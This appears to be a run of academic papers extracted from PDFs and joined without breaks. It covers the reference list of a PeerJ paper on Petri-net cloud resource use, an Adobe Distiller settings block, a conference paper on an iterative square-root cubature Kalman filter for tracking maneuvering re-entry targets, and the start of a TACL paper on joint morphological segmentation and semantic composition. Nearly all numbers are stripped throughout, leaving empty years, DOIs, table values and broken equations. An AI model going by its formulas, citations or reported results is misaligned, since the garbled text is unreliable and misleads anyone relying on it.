scheduling on the cloud. in: international conference on algorithms and architectures for parallel processing, cham: springer, – . milner r. . the definition of standard ml: revised. cambridge: mit press. patterson da. . the data center is the computer. communications of the acm ( ): doi . / . . sajid m, raza z. . cloud computing: issues & challenges. international conference on cloud, big data and trust ( ): – . shen y, bao z, qin x, shen j. . adaptive task scheduling strategy in cloud: when energy consumption meets performance guarantee. world wide web—internet and web information systems ( ): – . ullman jd. . elements of ml programming ml edition. vol. . upper saddle river: prentice hall. varghese b, buyya r. . next generation cloud computing: new trends and research directions. future generation computer systems : – doi . /j.future. . . . virendra m, jadliwala m, chandrasekaran m, upadhyaya s. . quantifying trust in mobile ad-hoc networks. in: integration of knowledge intensive multi-agent systems, . piscataway: ieee, – . wu cm, chang rs, chan hy. . a green energy-efficient scheduling algorithm using the dvfs technique for cloud datacenters. future generation computer systems : – doi . /j.future. . . . xia y, zhou m, luo x, pang s, zhu q. . a stochastic approach to analysis of energy-aware dvs-enabled cloud datacenters. ieee transactions on systems, man, and cybernetics: systems ( ): – doi . /tsmc. . . yuan h, bi j, tan w, li bh. . temporal task scheduling with constrained service delay for profit maximization in hybrid clouds. ieee transactions on automation science and engineering ( ): – doi . /tase. . . zhan zh, liu xf, gong yj, zhang j, chung hsh, li y. . cloud computing resource scheduling and a survey of its evolutionary approaches. acm computing surveys ( ): doi . / . rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /j.future. . . http://dx.doi.org/ . /tsmc. . http://dx.doi.org/ . /tase. . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ zhao q, xiong c, yu c, zhang c, zhao x. . a new energy-aware task scheduling method for data-intensive applications in the cloud. journal of network and computer applications : – doi . /j.jnca. . . . zuo l, shu l, dong s, zhu c, hara t. . a multi-objective optimization scheduling method based on the ant colony algorithm in cloud computing. ieee access : – doi . /access. . . rizwan ali et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.jnca. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ petri net based modeling and analysis for improved resource utilization in cloud computing introduction related work colored petri nets formal model of carom simulation analysis conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) levenberg-marquardt method based iterative square root cubature kalman filter and its applications to maneuvering re-entry target tracking mu jing school of computer science and engineering xi’an technological university xi’an, , china e-mail: mujing @ .com wang changyuan school of computer science and engineering xi’an technological university xi’an, , china e-mail: cyw @ .com abstract—levenberg-marquardt (abbr.l-m) method based iterative square root cubature kalman filter (abbr. isrckflm) inherits the numerical stability of square root cubature kalman filter and effectively suppresses the influence of the larger initial estimation error and the nonlinearity of the measurement equation on the state estimation in the nonlinear state estimation due to obtaining the optimal state and variance estimates using the latest measurement through l-m method. we apply the isrckflm algorithm to the state estimation of maneuvering re-entry target tracking, the simulation results demonstrate that the isrckflm algorithm has better accuracy of state estimation, comparable to unscented kalman filter and square root cubature kalman filter, according to estimation error analysis of the position, velocity, drag coefficient, turn coefficient and climbing force coefficient, and has fast convergence rate. keywords-nonlinear filtering; square root cubature kalman filter; levenberg-marquardt method; maneuvering re- entry targets tracking i. introduction the state estimate of maneuver re-entry target is highly non-linear filtering problem and has been much attention in the academic and engineering domain [ , ]. up to now, the commonly used non-linear filtering is the extended kalman filter (ekf) [ ]. the ekf is based on first-order taylor approximations of state transition and observation equation about the estimated state trajectory under gaussian assumption, so ekf may introduce significant bias, or even convergence problems due to the overly crude approximation [ ]. especially, for highly nonlinear problems such as state estimation of maneuver re-entry target, ekf may produce large filtering errors and even divergence. based on the unscented transformation (ut), the unscented kalman filter (ukf) use a set of deterministic sampling points to approximate the posterior probability distribution of the system state, that is, the sigma points are used to capture the mean and variance information of the state [ ]. recently, as a new way to solve the nonlinear estimation problem, cubature rules based cubature kalman filter (ckf) proposed in [ ] uses numerical multi-dimensional integral to approximate the recursive bayesian estimation integrals under the gaussian assumption. the ckf can solve high- dimensional nonlinear filtering problems with minimal computational effort. then the square root cubature kalman filter algorithm (srckf) was proposed in order to improve the numerical stability [ ]. on the other hand, in order to decrease the effect of initial estimation error and nonlinearity of measurement equation, levenberg-marquardt method based iterative square root cubature kalman filter (isrckflm) was developed on the basis of the srckf in [ ]. in this paper, we apply the isrckflm algorithm to state estimation of maneuver re-entry target. simulations demonstrate that the isrckflm algorithm can greatly improve the tracking accuracy of maneuver re-entry target and obtain fast convergence, compared with the ukf and srckf algorithms. the rest of the paper is organized as follows. we begin with a description of the isrckflm algorithm in section . then we apply the isrckflm algorithm to track re-entry ballistic target (rbt) with unknown ballistic coefficient and discuss the simulation results in section . finally, we draw conclusion in section . ii. l-m based iterative square root cubature kalman filter consider the following non-linear dynamics system:  ( ) k k k   x f x w    ( ) k k k  z h x v .  where f and h are some known nonlinear functions; xn k x and zn k z is state and the measurement vector, respectively; k  w and k v are process and measurement gaussian noise sequences with zero means and covariance k  q and k r , respectively, and { } k  w and { } k v are mutually uncorrelated. suppose that the state distribution at k- time is ˆ( , ) t k k k k    x x s s , levenberg-marquardt based iterative square root cubature kalman filter (isrckflm) is described as follows. international conference on sensor network and computer engineering (icsnce ) a. time update ) calculate the cubature points and propagate the cubature points through the state equation  , ˆ i k k i k    x s ξ x .   * , , ( ) i k i k  x f x   where [ ] , , , i i i x m m i m n   ξ ,the [ ] i is a x n dimensional vector and is generated according to the way described in [ ]. ) evaluate the predicted state and square root of the predicted covariance  * , m k i i k i    x x    * , ([ ]) k k q k tria  s χ s   here, , q k  s denotes a square-root factor of k  q and tria() is denoted as a general triagularization algorithm. the matrix * k χ is defined as:  * * * * , , , [ , , ] k k k k k m k k m   χ x x x x x x   ) evaluate the modified covariance:  t t t k k k k k k k i              p i s s s s i s s   where i  is adjusting parameter. b. measurement update ) set the initial value as: ( )ˆ k k x x . ) assuming the i-th iterate ( )ˆ i k x , calculate the matrix  ( ) ( ) ( ) ( )ˆ ˆ ˆ( ) ( ) ( ) i t i i t i k k h k h k k h k k       l p j x j x p j x r   ) calculate the i-th iterate      ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) ˆ ˆ ˆ( ) ( )( ) ˆ ˆ( ) ( ) i i k k k i i i k k h k k k i i i i k h k k k k           x x l z h x j x x x i l j x p x x   ) calculate the iteration termination condition  ( ) ( )ˆ ˆi i k k    x x or max i n    and max n are predetermined threshold and maximum iterate number, respectively. if the termination condition meets, the iterate return to ); otherwise, set ( ) ( )ˆ ˆ= i i k k  x x , continue to ). ) calculate the state estimation at time instant  ( )ˆ ˆ n k k x x   ) evaluate the cross-covariance and square root of innovation covariance at k time  ( )ˆ( ) t t n xz k k h k p s s j x    ( ) , ˆ( ( ) ) n zz h k k r k chol    s j x s s   ) calculate the square root of covariance at k time  / / t k xz zz zz k p s s    ( ) , ˆ( ( ) ) n k k k h k k k r k chol    s s k j x s k s   where symbol “/ ” represents the matrix right divide operator. iii. applications to maneuvering reentry target tracking in the simulation, the trajectory of the maneuvering re- entry generated in [ ] is used with the same parameters, initial state and covariance estimation. to compare the performance of the isrckflm with the ukf and srckf algorithms, we obtain the root mean square errors (rmses) in the position, velocity, drag coefficient, turn coefficient and climb coefficient showed in the figure - . all performance curves were obtained by averaging over independent monte carlo runs. table. lists the accumulated root mean square errors (armses). altitude/km r m s e i n p o s it io n /m ukf srckf isrckflm figure . rmse in position from figur. - , we can see the isrckflm’s rmses in positon and velocity are lower than those of ukf and srckf algorithms, especially, the rmses of isrckflm international conference on sensor network and computer engineering (icsnce ) algorithm are effectively suppressed, and those of ukf and srckf algorithms have a big jump when the target experiences the high maneuver at altitude km and km. altitude/km r m s e i n v e lo c it y /m s - ukf srckf isrckflm figure . rmse in velocity . . . . . altitude/km r m s e i n d ra g c o e ff ic ie n t( - )/ k g m - ukf srckf isrckflm figure . rmse in drag coefficient . . . altitude/km r m s e i n t u rn c o e ff ic ie n t( - )/ k g m - ukf srckf isrckflm figure . rmse in turn coefficient as for the estimate on drag coefficient, turn coefficient and climbing coefficient of maneuver re-entry target, from figure. - we can see the rmses of three algorithms decrease between km- km at altitude, and the rmses of three algorithms reach the smallest at about km at altitude. then the rmses of three algorithms increases when a dive and turn maneuver occurs on re-entry target, however, the isrckflm’s rmses are lower than those of the other two algorithms. the rmses of all filters gradually increase when the target experiences an increased climb force at altitude km- km, but the isrckflm’s rmse increases slightly slower. after the maneuver was withdrawn, the rmse of the three algorithms began to decline. altitude/km r m s e i n c li m b in g c o e ff ic ie n t( - )/ k g  m - ukf srckf isrckflm figure . rmse in climbing coefficient table i. armses in three filters algori- thms armsep /m armsev /ms - armsed/ kgm - armset /kgm - armsec /kgm - ukf . . . . . srckf . . . . . isrckf lm . . . . . moreover, the armses of the isrckflm in the positon, velocity, drag coefficient, turn coefficient and climbing coefficient are lower than those of ukf and srckf algorithms from table. . therefore, on the basis of the simulation results presented in figure. - , we can draw a conclusion that the isrckflm yields on the superior performance over the ukf and srckf on the state estimation of maneuvering re-entry target. iv. conclusion in this paper we apply the isrckflm algorithm to maneuvering re-entry target tracking. the latest measurement are fully used in the isrckflm algorithm, and innovation covariance and cross-covariance are improved in the iterative process, so we can obtain the optimal state estimation and covariance estimation. simulation results demonstrate that the performance of isrckflm algorithm is superior to ukf and ckf algorithms by analysis of errors in position, velocity, drag international conference on sensor network and computer engineering (icsnce ) coefficient, turn coefficient and climbing coefficient, and has the faster convergence rate. acknowledgment the authors would like to thank the support of fund of the state and local joint laboratory of advanced network and monitoring control engineering (no.gsysj ); natural science basic research program of department of science and technology of shaanxi province - youth foundation (no. jq ); the key project of department of education of shaanxi province (no. jf ). references [ ] li xr, jilkov vp. a survey of maneuvering target tracking - part ii: ballistic target models. signal and data processing of small targets, , : - . [ ] farina a, ristic b, benvenuti d. tracking a ballistic target: comparison of several nonlinear filters. ieee transactions on aerospace and electronic systems, , ( ): - . [ ] bar-shalom y, li xr, kirubarajan t. estimation with applications to tracking and navigation. new york: john wiley &son, inc, . [ ] athans m, wishner rp, bertolini a. suboptimal state estimation for continuous-time nonlinear system from discrete noisy measurements[j]. ieee transactions on automatic control, , ( ): - . [ ] julier sj, uhlmann jk. unscented filtering and nonlinear estimation. proceedings of the ieee, , ( ): - . [ ] arasaratnam i, haykin s. cubature kalman filters. ieee transactions on automatic control, , ( ): - . [ ] mu. j.; cai. y.; wang. c.y. l-m method based iteration cubature kalman filter and its applications, journal of xi’an technological university, , ( ): - . [ ] jing mu, yuanli cai, changyuan wang. state estimation of maneuvering reentry target using likelihood based iterated divided difference filter, journal of xi’an technological university, ( ): - , . . joint semantic synthesis and morphological analysis of the derived word ryan cotterell department of computer science johns hopkins university ryan.cotterell@jhu.edu hinrich schütze cis lmu munich inquiries@cislmu.org abstract much like sentences are composed of words, words themselves are composed of smaller units. for example, the english word questionably can be analyzed as question+able+ly. however, this structural decomposition of the word does not directly give us a semantic representation of the word’s meaning. since morphology obeys the principle of compositionality, the semantics of the word can be systematically derived from the meaning of its parts. in this work, we propose a novel probabilistic model of word formation that captures both the analysis of a word w into its constituent segments and the synthesis of the meaning of w from the mean- ings of those segments. our model jointly learns to segment words into morphemes and compose distributional semantic vectors of those morphemes. we experiment with the model on english celex data and german derivbase (zeller et al., ) data. we show that jointly modeling semantics increases both segmentation accuracy and morpheme f by between % and %. additionally, we investigate different models of vector compo- sition, showing that recurrent neural networks yield an improvement over simple additive models. finally, we study the degree to which the representations correspond to a linguist’s notion of morphological productivity. introduction in most languages, words decompose further into smaller units, termed morphemes. for example, the english word questionably can be analyzed as question+able+ly. this structural decomposition of the word, however, by itself is not a semantic rep- resentation of the word’s meaning; we further re- quire an account of how to synthesize the meaning from the decomposition. fortunately, words—just like phrases—to a large extent obey the principle of compositionality: the semantics of the word can be systematically derived from the meaning of its parts. in this work, we propose a novel joint prob- abilistic model of word formation that captures both structural decomposition of a word w into its con- stituent segments and the synthesis of w’s meaning from the meaning of those segments. morphological segmentation is a structured pre- diction task that seeks to break a word up into its constituent morphemes. the output segmentation has been shown to aid a diverse set of applications, such as automatic speech recognition (afify et al., ), keyword spotting (narasimhan et al., ), machine translation (clifton and sarkar, ) and parsing (seeker and çetinoğlu, ). in contrast to much of this prior work, we focus on supervised segmentation, i.e., we provide the model with gold segmentations during training time. instead of sur- there are many different linguistic and computational theo- ries for interpreting the structural decomposition of a word. for example, un- often signifies negation and its effect on semantics can then be modeled by theories based on logic. this work ad- dresses the question of structural decomposition and semantic synthesis in the general framework of distributional semantics. morphological research in theoretical and computational linguistics often focuses on noncompositional or less com- positional phenomena—simply because compositional deriva- tion poses fewer interesting research problems. it is also true that—just as many frequent multiword units are not completely compositional—many frequent derivations (e.g., refusal, fit- ness) are not completely compositional. an indication that non- lexicalized derivations are usually compositional is the fact that standard dictionaries like oup editors ( ) list derivational affixes with their compositional meaning, without a hedge that they can also occur as part of only partially compositional forms. see also haspelmath and sims ( ), § . . . transactions of the association for computational linguistics, vol. , pp. – , . action editor: regina barzilay. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. face segmentation, our model performs canonical segmentation (cotterell et al., a; cotterell et al., b; kann et al., ), i.e., it allows the induc- tion of orthographic changes together with the seg- mentation, which is not typical. for the example questionably, our model can restore the deleted char- acters le, yielding the canonical segments question, able and ly. in this work, our primary contribution lies in the integration of continuous semantic vec- tors into supervised morphological segmentation— we present a joint model of morphological analysis and semantic synthesis at the word-level. we experimentally investigate three novel aspects of our model. • first, we show that jointly modeling continu- ous representations of the semantics of mor- phemes and words allows us to improve mor- phological analysis. on the english portion of celex (baayen et al., ), we achieve a point improvement in segmentation accuracy and a point improvement in morpheme f . on the german derivbase dataset we achieve a point improvement in segmentation accu- racy and a point improvement in morpheme f . • second, we explore improved models of vec- tor composition for synthesizing word mean- ing. we find a recurrent neural network im- proves over previously proposed additive mod- els. moreover, we find that more syntactically oriented vectors (levy and goldberg, a) are better suited for morphology than bag-of- word (bow) models. • finally, we explore the productivity of english derivational affixes in the context of distribu- tional semantics. derivational morphology two important goals of morphology, the linguistic study of the internal structure of words, are to de- scribe the relation between different words in the lexicon and to decompose them into morphemes, the smallest linguistic unit bearing meaning. morphol- ogy can be divided into two types: inflectional and derivational. inflectional morphology is the set of processes through which the word form outwardly displays syntactic information, e.g., verb tense. it follows that an inflectional affix typically neither changes the part-of-speech (pos) nor the semantics of the word. for example, the english verb to run takes various forms: run, runs, ran and running, all of which convey “moving by foot quickly”, but ap- pear in complementary syntactic contexts. derivation deals with the formation of new words that have semantic shifts in meaning (often includ- ing pos) and is tightly intertwined with lexical se- mantics (light, ). consider the example of the english noun discontentedness, which is derived from the adjective discontented. it is true that both words share a close semantic relationship, but the transformation is clearly more than a simple inflec- tional marking of syntax. indeed, we can go one step further and define a chain of words content → contented → discontented → discontentedness. in the computational literature, derivational mor- phology has received less attention than inflectional. there are, however, two bodies of work on deriva- tion in computational linguistics. first, there is a series of papers that explore the relation between lexical semantics and derivation (lazaridou et al., ; zeller et al., ; padó et al., ; kisse- lew et al., ). all of these assume a gold mor- phological analysis and primarily focus on the ef- fect of derivation on distributional semantics. the second body of work, e.g., the unsupervised mor- phological segmenter morfessor (creutz and la- gus, ), does not deal with semantics and makes no distinction between inflectional and derivational morphology. even though the boundary between inflectional and derivational morphology is a con- tinuum rather than a rigid divide (haspelmath and sims, ), there is still the clear distinction that derivation changes meaning whereas inflection does not. our goal in this paper is to develop an account of how the meaning of a word form can be computed jointly, combining these two lines of work. productivity and semantic coherence. we highlight two related issues in derivation that moti- vated the development of our model: productivity narasimhan et al. ( ) also make no distinction between inflectional and derivational morphology, but their model is an exception in that it includes vector similarity as a semantic fea- ture. see § for discussion. and semantic coherence. roughly, a productive affix is one that can still actively be employed to form new words in a language. for example, the english nominalizing affix ness (red →red+ness) can be attached to just about any adjective, including novel forms. in contrast, the archaic english nominal- izing affix th (dear →dear+th, heal →heal+th, steal →steal+th) does not allow us to form new words such as cheapth. this is a crucial issue in derivational morphology since we would not in general want to analyze new words as having been formed from non-productive endings; e.g., we do not want to analyze hearth as hear+th (or wugth as wug+th). relations such as those between heal and health are lexicalized since they no longer can be derived by productive processes (bauer, ). under a generative treatment (chomsky, ) of morphology, productivity becomes a central no- tion since a grammar needs to account for active word formation processes in the language (aronoff, ). defining productivity precisely, however, is tricky; aronoff ( ) writes, “one of the central mysteries of derivational morphology . . . [is that] . . . though many things are possible in morphology, some are more possible than others.” nevertheless, speakers often have clear intuitions about which af- fixes in the language are productive. related to productivity is the notion of seman- tic coherence. the principle of compositionality (frege, ; heim and kratzer, ) applies to interpretation of words just as it does to phrases. in- deed, compositionality is often taken to be a sig- nal for productivity (aronoff, ). when de- ciding whether to further decompose a word, ask- ing whether the parts sum up to the whole is of- ten a good indicator. in the case of questionably → question+able+ly, the compositional meaning is “in a manner that could be questioned”, which corresponds to the meaning of the word. contrast this with the word unquiet, which means “restless”, rather than “not quiet” and the compound blackmail, which does not refer to a letter written in black ink. the model we will describe in § is a joint model of both semantic coherence and segmentation; that it is also important to distinguish productivity from creativity—a non-rule-governed form of word formation (lyons, ). as an example of creativity, consider the cre- ation of portmanteaux, e.g., dramedy and soundscape. is, an analysis is judged not only by character-level features, but also by the degree to which the word is semantically compositional. implicit in such a treatment is the desire to only segment a word if the segmentation is derived from a productive process. while most prior work on morphological segmen- tation has not explicitly modeled productivity, we believe, from a computational modeling perspective, segmenting only productive affixes is preferable. this is analogous to the modeling of phrase compo- sitionality in embedding models, where it can be bet- ter to not further decompose noncompositional mul- tiword units like named entities and idiomatic ex- pressions; see, e.g., mikolov et al. ( b), wang et al. ( ), yin and schütze ( ), yaghoobzadeh and schütze ( ), and hashimoto and tsuruoka ( ). in this paper, we refer to the semantic aspect of the model either as semantic synthesis or as coherence. these are two ways of looking at semantics that are related as follows. if the synthesis (i.e., composi- tion) of the meaning of the derived form from the meaning of its parts is a regular application of the linguistic rules of derivation, then the meaning so constructed is coherent. these are the cases where a joint model is expected to be beneficial for both segmentation and interpretation. a joint model from an nlp perspective, canonical segmentation (naradowsky and goldwater, ; cotterell et al., b) is the task that seeks to algorithmically de- compose a word into its canonical sequence of mor- phemes. it is a version of morphological segmenta- tion that requires the learner to handle orthographic changes that take place during word formation. we believe this is a more natural formulation of mor- phological analysis—especially for the processing note that segmenters such as morfessor utilize the prin- ciple of minimum description length, which implicitly encodes productivity, in order to guide segmentation. as a reviewer points out, productivity of an affix and se- mantic coherence of the words formed from it are not perfectly aligned. nonproductive affixes can produce semantically coher- ent words, e.g., warm →warm+th. productive affixes can pro- duce semantically incoherent words, e.g., canny →un+canny. again, this is analogous to multiword units. however, there is a strong correlation and our experiments show that relying on it gives good results. un question able ly su ffi x su ffi x st em pr ef ix unquestionably + + + unquestionablely ⇡ surface form underlying form segmentation vector composition ta rg et figure : a depiction of the joint model that makes the relation between the three factors and the observed sur- face form explicit. we show a simple additive model of composition for ease of explication. of derivational morphology—as it draws heavily on linguistic notions (see § ). the main innovation we present is the augmen- tation of canonical segmentation to take into ac- count semantic coherence and productivity. con- sider the word hypercuriosity and its canonical seg- mentation hyper+curious+ity; this canonical seg- mentation seeks to decompose the word into its con- stituent morphemes and account for orthographic changes. this amounts to a structural decomposi- tion of the word, i.e., how do we break up the string of characters into chunks? this is similar to the de- composition of a sentence into a parse tree. how- ever, it is also natural to consider the semantic com- positionality of a word, i.e., how is the meaning of the word synthesized from the meaning of the indi- vidual morphemes? we consider both of these questions together in a single model, where we would like to place high probability on canonical segmentations that are also semantically coherent. returning to hy- percuriosity, we could further decompose it into hyper+cure+ous+ity in analogy to, say, vice → vicious. nothing about the surface form of curi- ous alone gives us a strong cue that we should rule out the segmentation cure+ous. turning to distri- butional semantics, however, it is the case that the contexts in which curious occurs are quite different from those in which cure occurs. this gives us a strong cue which segmentation is correct. formally, given a word string w ∈ Σ∗, where Σ is a discrete alphabet of characters (in english this could be as simple as the letter lowercase alpha- bet), and a word vector v ∈ v , where v is a set of low-dimensional word embeddings, we define the model as: p(v,s, l,u |w) = zθ(w) exp ( σ ||v −cβ(s,l)|| +f(s,l,u)>η + g(u,w)>ω ) . ( ) this model is composed of three factors: composi- tion factor ( σ ||v−cβ(s,l)|| ), segmentation factor f and transduction factor g. the parameters of the model are θ = {β,η,ω}, the function cβ composes morpheme vectors together, s is the segmentation, l is the labeling of the segments, u is the underlying representation and zθ(w) is the partition function. note that the conditional distribution p(v | s,l,u,w) is gaussian distributed by construction. a visualiza- tion of our model is found in figure . this model is a conditional random field (crf) that is mixed, i.e., it is defined over both discrete and continuous random variables (koller and friedman, ). we restrict the range of u to be a subset of Σ|w|+k, where k is an insertion limit (dreyer, ). in this work, we take k = . explicitly, the partition function is defined as zθ(w) = ∫ ∑ l′,s′,u′ exp ( σ ||v′ −cβ(s′, l′)|| + f(s′, l′,u′)>η + g(u′,w)>ω ) dv′, ( ) which is guaranteed to be finite. a crf is simply the globally renormalized prod- uct of several non-negative factors (sutton and mccallum, ). our model is composed of three: transduction, segmentation and composition factors—we describe each in turn. . transduction factor the first factor we consider is the transduction factor: exp ( g(u,w)>ω ) , which scores a surface since we have capped the insertion limit, we have a finite number of values that u can take for any w. thus, it follows that we have a finite number of canonical segmentations s. hence we take a finite number of gaussian integrals. these integrals all converge since we have fixed the covariance matrix as σ i, which is positive definite. representation (sr) w, the character string ob- served in raw text, and an underlying represen- tation (ur), a character string with orthographic processes reversed. the aim of this factor is to place high weight on good pairs, e.g., the pair (w=questionably,u=questionablely), so we can ac- curately restore character-level changes. we encode this portion of the model as a weighted finite-state machine for ease of computation. this factor generalizes probabilistic edit distance (ristad and yianilos, ) by looking at additional input and output context; see cotterell et al. ( ) for de- tails. as mentioned above and in contrast to cot- terell et al. ( ), we bound the insertion limit in the edit distance model. computing the score be- tween two strings u and w requires a dynamic pro- gram that runs in o(|u|·|w|). this is a generalization of the forward algorithm for hidden markov models (hmms) (rabiner, ). we employ standard feature templates for the task that look at features of edit operations, e.g., substi- tute i for y, in varying context granularities. see cotterell et al. ( b) for details. recent work has also explored weighting of wfst arcs with scores computed by lstms (hochreiter and schmidhuber, ), obviating the need for human selection of feature templates (rastogi et al., ). . segmentation factor the second factor is the segmentation factor: exp ( f(s,l,u)>η ) . the goal of this factor is to score a segmentation s of a ur u. in our example, it scores the input-output pair (u=questionablely, s=question+able+ly). it additionally scores a labeling of the segmentation. our label set in this work is l = {stem, prefix, suffix}. the proper labeling of the segmentation above is l=question:stem+able:suffix+ly:suffix. the label- ing is critical for our composition functions cβ (cot- terell et al., ): which vectors are used depends on the label given to the segment; e.g., the vectors of the prefix “post” and the stem “post” are different. we can view this factor as an unnormalized first- as our transduction model is an unnormalized factor in a crf, we do not require the local normalization discussed in cotterell et al. ( )—a weight on an edge may be any non- negative real number since we will renormalize later. the un- derlying model, however, remains the same. model composition function stem c = ∑n i= li=stemm li si mult c = ⊙n i= m li si add c = ∑n i= m li si wadd c = ∑n i= αim li si fulladd c = ∑n i= uim li si lds hi = xhi− + umlisi rnn hi = tanh(xhi− + umlisi ) table : composition models cβ(s,l) used in this and prior work. the representation of the word is hn for the dynamic and c for the non-dynamic models. note that for the dynamic models h is a learned parameter. order semi-crf (sarawagi and cohen, ). com- putation of the factor again requires dynamic pro- gramming. the algorithm is a different generaliza- tion of the forward algorithm for hmms, one that extends it to the semi-markov case. this algorithm runs in o(|u| · |l| ). features. we again use standard feature templates for the task. we create atomic indicator features for the individual segments. we then conjoin the atomic features with left and right context features as well as the label to create more complex feature templates. we also include transition features that fire on pairs of sequential labels. see cotterell et al. ( ) for details. recent work has also showed that a neural parameterization can remove the need for manual feature design (kong et al., ). . composition factor the composition factor takes the form of an unnormalized multivariate gaussian density: exp ( σ ||v −cβ(s,l)|| ) , where the mean is computed by the (potentially non-linear) compo- sition function (see table ) and the covariance matrix σ i is a diagonal matrix. 